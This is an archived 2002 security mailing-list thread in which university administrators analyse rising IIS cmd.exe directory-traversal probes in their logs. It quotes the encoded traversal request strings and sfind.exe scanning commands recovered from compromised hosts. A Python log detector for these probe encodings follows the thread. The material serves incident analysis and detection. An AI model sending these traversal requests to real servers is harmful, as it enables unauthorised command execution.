[unisog] increasing cmd.exe port 80/tcp probes

Lois Lehman LOIS.LEHMAN at asu.edu
Mon Jun 3 17:08:01 GMT 2002


I have found data left behind on compromised Windows workstations that is
probably related to this activity.  We have received reports that there was
Nimda activity coming from these workstations and could find nothing that
would indicate it was truly Nimda.

In searching two of the compromised computers, data was found in the
Recycler similar to this:

COMMAND:
c:\RECYCLER\s-1-5-21-436374069-261478967-1417001333-1503\new\sfind.exe -uni
149.160.0.0 149.167.255.255 
COMMAND OVER.


COMMAND:
c:\RECYCLER\s-1-5-21-436374069-261478967-1417001333-1503\new\sfind.exe -uni
212.250.238.255 212.250.255.255 
212.250.240.4 find unicode hole
212.250.240.85 find unicode hole
212.250.240.83 find unicode hole
212.250.240.121 find unicode hole
COMMAND OVER.

It appeared that everything else related to this activity had been removed.
If I have a chance to look at another one, I will dig deeper and share to
the list.

Lois Lehman, GSEC
Physical Sciences Computer Support
Dean's Office
College of Liberal Arts & Sciences
Arizona State University
480-965-3139

-----Original Message-----
From: Jeff Anderson-Lee [mailto:jonah at eecs.berkeley.edu]
Sent: Monday, June 03, 2002 9:38 AM
To: unisog at sans.org
Subject: Re: [unisog] increasing cmd.exe port 80/tcp probes


These probing patterns are IIS Directory Traversal probes, but
they are not indicative of any CodeRed or Nimda variant that I am
aware of.  The CERT Advisories list explicit probe patterns for
these which I am familiar with:

http://www.cert.org/advisories/CA-2001-19.html (CodeRed)
http://www.cert.org/incident_notes/IN-2001-09.html (Code Red II)
http://www.cert.org/advisories/CA-2001-26.html (Nimda)

This appears to be something new, attacking the same security hole.
If you can point to information to the contrary, I'd greatly appreciate
it.

Jeff Anderson-Lee
Systems Manager, Digital Library Project
ERL, University of California at Berkeley

> Hello Jeff,
>
> Others have most probably already responded... this pattern is indicative 
> of CodeRed.
>
> At 10:04 AM 6/2/2002 -0700, you wrote:
>
>> Starting on Jan 5, 2002 I've been noticing some particular probes
>> appearing regularly in my apache logs.  There are two patterns of
>> note.  The first is a single probe:
>>
>>    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
>>
>> and the second is a pair of probes:
>>
>>    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
>>    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ 
>> HTTP/1.1"
>>
>> At first, seeing a new host with one of these probe patterns was a
>> weekly event, then later about once a day.  However in the past 
>> thirty-six
>> hours I've started to see a sudden rise in the incidence of new hosts
>> scanning with the first pattern:
>>
>> dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 
>> -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 
>> 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>>
>>
>> Has anyone else noticed these patterns in their logs?
>> Does anyone know if a virus/worm has been identified with this
>> probing pattern?
>
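Added example, not part of the thread: a small Python detector for the three probe encodings quoted in Jeff's original message (double-encoded backslash `%255c`, overlong UTF-8 slash `%c0%af`, double-encoded dot `%252e`), run over constructed Common Log Format lines modelled on the ones above. The `%c1%9c` handling and the placeholder client IPs are assumptions, not taken from the page.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote
# Constructed Apache-style log lines modelled on the probes quoted in the thread;
# client IPs are documentation-range placeholders, not real hosts.
SAMPLE_LOG = r'''
203.0.113.5 - - [31/May/2002:22:39:46 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234
203.0.113.6 - - [31/May/2002:22:43:07 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234
203.0.113.6 - - [31/May/2002:22:43:08 -0700] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 3234
203.0.113.7 - - [01/Jun/2002:05:50:48 -0700] "GET /index.html HTTP/1.1" 200 1024
'''
# Common Log Format prefix up to the request target (stops at whitespace or the closing quote).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>[^"\s]+)')
# Overlong UTF-8 '/' (%c0%af, as quoted above) and '\' (%c1%9c; assumption, not on the page).
OVERLONG_RE = re.compile(r'%c0%af|%c1%9c', re.IGNORECASE)

def normalize(target: str) -> str:
    """Decode the path as a lenient IIS did: map overlong slashes, percent-decode
    repeatedly (%255c -> %5c -> '\\'), fold '\\' to '/' and lowercase."""
    path = target.split('?', 1)[0]
    for _ in range(3):  # two rounds undo double encoding; the third confirms stability
        step = unquote(OVERLONG_RE.sub('/', path))
        if step == path:
            break
        path = step
    return path.replace('\\', '/').lower()

def classify(target: str) -> Optional[str]:
    """Label a cmd.exe traversal probe by its encoding trick, or None if benign."""
    norm = normalize(target)
    if '..' not in norm.split('/') or not norm.endswith('cmd.exe'):
        return None
    raw = target.lower()
    if '%c0%af' in raw or '%c1%9c' in raw:
        return 'unicode-overlong'
    if '%255c' in raw:
        return 'double-encoded-backslash'
    if '%252e' in raw:
        return 'double-encoded-dot'
    return 'plain-traversal'

def scan(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, probe_label) for every flagged request in the log text."""
    hits = []
    for line in log_text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if m and (label := classify(m['target'])):
            hits.append((m['ip'], label))
    return hits
```

Matching on the decoded path rather than the raw request string is what keeps the three encodings from needing three separate signatures.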